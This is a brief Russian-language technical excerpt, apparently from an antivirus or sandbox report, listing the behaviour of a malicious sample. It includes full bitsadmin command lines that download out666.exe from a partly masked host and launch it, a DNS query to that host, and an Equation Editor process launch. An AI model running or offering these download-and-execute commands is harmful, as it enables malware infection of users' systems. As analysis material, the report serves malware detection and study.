Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer jM /priority foreground http://re###pro.com/4pg/out666.exe %USERPROFILE%\iGO.exe && start %USERPROFILE%\iGO.exe
- DNS ASK re###pro.com
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer jM /priority foreground http://re###pro.com/4pg/out666.exe %USERPROFILE%\iGO.exe && start %USERPROFILE%\iGO.exe' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer jM /priority foreground http://re###pro.com/4pg/out666.exe %HOMEPATH%\iGO.exe